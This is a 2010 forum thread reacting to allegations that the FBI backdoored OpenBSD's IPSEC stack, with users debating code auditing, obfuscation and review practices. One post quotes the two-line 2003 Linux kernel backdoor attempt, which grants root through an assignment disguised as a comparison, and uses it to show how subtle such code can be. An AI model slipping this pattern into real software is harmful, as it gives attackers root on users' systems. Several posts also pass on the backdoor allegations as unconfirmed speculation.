# FBI Alleged To Have Backdoored OpenBSD's IPSEC Stack



## UNIXgod (Dec 15, 2010)

wow

http://marc.info/?l=openbsd-tech&m=129236621626462&w=2

I wonder if this affects us as well?


----------



## rbelk (Dec 15, 2010)

I often wondered why the FBI wanted people to use OpenBSD as their Firewall/VPN system.


----------



## nekoexmachina (Dec 15, 2010)

Who can tell you no FreeBSD guys've done the same thing?
The linux ones? NetBSD? 
Only non-affected system could be, err, plan9, just cause of its  popularity


----------



## qsecofr (Dec 15, 2010)

One of the great selling points of open source software is that the code is public, it's viewed, reviewed, and audited by any number of persons, and theoretically such a backdoor couldn't conceivably exist (for 10 years!).  My guess is Theo panicked by writing such an email.  Or did he?  I'd have expected a GPG-signed email.  Anyway the burden is probably on the OpenBSD team to prove their product is secure by default, not those being accused.  Loss of confidence in any cryptographic algorithm could have real bad consequences world-wide.


----------



## nekoexmachina (Dec 15, 2010)

> that the code is public,


And could be obfuscated enough to put there some code you would not want to run.


----------



## fender0107401 (Dec 15, 2010)

*Seems OpenBSD IPSEC is backdoored, how about FreeBSD?*

[ threads merged - Mod ]


----------



## lomsky (Dec 15, 2010)

Its not confirmed yet from OpenBSD maintainer, but they still in progress auditing the stack place from IPSECS. You can check it IPSEC stack here http://bit.ly/dSs4vV. Based on that email, the location are in the stack vector, so in FreeBSD the stack vector are here http://bit.ly/dUTiiu and it seems that those source are different. But thats only based on the email wich is inform that the backdoor are on IPSEC stack.


----------



## kpedersen (Dec 15, 2010)

I would like to believe that no obfuscated code lives in the *BSD codebase 

... right guys... ?


----------



## graudeejs (Dec 15, 2010)

read comments on http://www.osnews.com/story/24136/_FBI_Added_Secret_Backdoors_to_OpenBSD_IPSEC_

In one comment I saw this: http://cm.bell-labs.com/who/ken/trust.html


----------



## overmind (Dec 15, 2010)

*Backdoors in IPSEC?*

Here is the story:

http://gizmodo.com/5713735/how-the-fbi-planted-backdoors-in-secure-communication-protocols

Don't know if is true.


----------



## DutchDaemon (Dec 15, 2010)

Can people stop opening new topics for this? Thanks


----------



## adamk (Dec 15, 2010)

qsecofr said:
			
		

> My guess is Theo panicked by writing such an email.



I doubt that very much.  He probably wrote the e-mail because he knew that if he didn't, and someone came forwarded publicly, making those same claims, and saying that they already notified Theo, everyone would accuse him of trying to cover it up.

Adam


----------



## DutchDaemon (Dec 15, 2010)

Exactly. Treat it like 'any other bug' and fess up. Simple as that.


----------



## anomie (Dec 15, 2010)

nekoexmachina said:
			
		

> And could be obfuscated enough to put there some code you would not want to run.



Not to belabor this point too much, but it's exactly right. Even Bourne shell scripts can be obfuscated to the extent that they're almost impossible for a human to interpret. (Seriously - I've inherited some wonderful examples.) Imagine the type of crud you can mask in complex C code.


----------



## graudeejs (Dec 15, 2010)

anomie said:
			
		

> Not to belabor this point too much, but it's exactly right. Even Bourne shell scripts can be obfuscated to the extent that they're almost impossible for a human to interpret. (Seriously - I've inherited some wonderful examples.) Imagine the type of crud you can mask in complex C code.



Ye, I've seen sh script (and howto for that matter [Don't have link any more]) that was obscured asm code


----------



## UNIXgod (Dec 15, 2010)

Bounties are being set up now:

http://maycontaintracesofbolts.blogspot.com/2010/12/openbsd-ipsec-backdoor-allegations.html


----------



## vdvluc (Dec 15, 2010)

Mail from Perry:
http://blogs.csoonline.com/1296/an_fbi_backdoor_in_openbsd


----------



## Alt (Dec 16, 2010)

qsecofr said:
			
		

> One of the great selling points of open source software is that the code is public, it's viewed, reviewed, and audited by any number of persons


It CAN be audited, but..
For excample this linux backdoor attempt was almost done in 2003. This patch was dropped because signature missmatch, buf if a commiter can upprove this ?

```
+       if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+                       retval = -EINVAL;
```
This is backdoor and it differs from normal code by 1byte. Sure it can be viewed, reviewed, and audited by any number of persons, but...


----------



## qsecofr (Dec 18, 2010)

I may have an interpretation of "audit" that is all my own then.    I'd like to think that not only is the code audited for bugs, but it is audited for achieving its purpose.

Not to say that mistakes can't be made.  It's the nature of the business.  In which case find/fix/patch followed by security advisory seems appropriate..  Once proven found, that is.

Dishonesty among commiters seems more an organization & operational issue.  More stringent auditing might help deter that.

Regarding the original external link, I still think it's OpenBSD's responsibility to protect their brand.  The suggestion that the accused should somehow prove their innocense seems an abdication of responsibility in my opinion.  In my ignorance I don't really know if Theo represents the OpenBSD team in any capacity.  But if so, I'd suggest PGP-signed emails if sent as official communications of the group.

Trust will probably become one of the big issues in IT.  If it isn't already.  I mean with all the spam, I don't even trust emails from my own mother unless they're PGP-signed.


----------



## SENECA (Dec 19, 2010)

*Report of FBI back door roils OpenBSD community.*

Hello everyone.

First of all wish you a Merry Christmas and a Happy New Year.

A couple of days ago I came across this news in a forum Informatica, and I take the hands to the head.

Source: http://news.cnet.com/8301-31921_3-20025767-281.html?tag=topStories1

OpenBSD (an open source operating system with rear doors).
I know that OpenBSD and FreeBSD are not the same, but ...
What do you think about it?
Something similar would be possible in FreeBSD?
Is there no one to monitor the source code?



Thanks for your time.

Bye bye.

P. S. Presuppose the truth of the assertion of the existence of those backdoors.


----------



## DutchDaemon (Dec 19, 2010)

Again: can people stop opening new topics for this? Thanks..


----------



## bes (Dec 21, 2010)

Gregory Perry - John Young correspondence published on  Cryptome.org


----------



## lockfile (Dec 30, 2010)

bes said:
			
		

> Gregory Perry - John Young correspondence published on  Cryptome.org




Wow that post was a trip. Especially this link: http://mickey.lucifier.net/b4ckd00r.html . That is the exact stuff conspiracy theories are made of. Where is the tin-foil hat smilie? An OpenBSD hacker was talking about intelligence agents from the Navy and FBI telling him to keep his mouth shut over OpenBSD. This stuff has been going on since early '90s! Incredible. 

Well obviously there are "feds in your systems." 

Privacy is important. Also, catching tourists is important too, but citizens civil (and human) right to privacy is of higher priority than catching tourists.

Firstly, I say we use the nature of open source software to uproot them from our systems. We need to do a full code audit of the secure kernel.

Secondly, strict coding and format rules should be devised so as to prevent the insertion of obfuscated code. Coding standards exist for most free software projects today, but these special set of rules will be structured in such a way as to highlight "devious and obfuscate code" or code that does not make it obvious to what it is doing.  

Thirdly, we have a "chieftan" or "a roundtable of chieftans" that are switched yearly to review each and every piece of code on a certain part of the system; core of the kernel, networking, IPSEC stuff, etc. Debates, investigations, and discussions will be had before any suspected code is let loose.

Fourthly, I say a website be created that scrolls recently added code on a screen for at least 3 months. Then each day, a piece of code is picked from the screen and inspected for nefariousness.

Fifthly, create a code auditing suite of analysis apps that find obfuscated code, or code that is suspected of being obfuscated. Data analysis is being applied to everything today. Why not apply it to some C files?


----------



## Alt (Jan 4, 2011)

lockfile this will not help against fbi. They are way powerful than you can imagine..


----------



## lockfile (Jan 4, 2011)

Alt said:
			
		

> lockfile this will not help against fbi. They are way powerful than you can imagine..



Yes you are right. The FBI should be looking out for Americans' interests, not suppressing them. 

I recently read that your PM Putin just ordered the government to put critical system on Linux. I was surprised to hear that they were not already! That is good news.


----------

